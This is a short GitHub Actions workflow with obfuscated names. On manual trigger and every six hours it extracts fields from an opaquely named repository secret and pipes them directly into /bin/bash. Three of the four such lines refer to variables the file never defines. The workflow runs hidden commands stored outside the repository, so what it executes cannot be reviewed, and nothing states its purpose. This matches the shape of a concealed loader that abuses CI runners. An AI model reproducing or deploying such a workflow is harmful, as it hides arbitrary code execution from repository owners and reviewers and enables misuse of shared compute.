name: highjumpgetaway

on:
  workflow_dispatch:
  schedule:
    - cron: '1 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: highjumpgetaway
        env:
          m5742: ${{ secrets.m5742 }}
        run: |
          echo $m5742 | jq -r .bq248 | /bin/bash
          echo $vlg43723 | jq -r .fgb35 | /bin/bash
          echo $i66 | jq -r .dz8666 | /bin/bash
          echo $p767 | jq -r .rc28 | /bin/bash

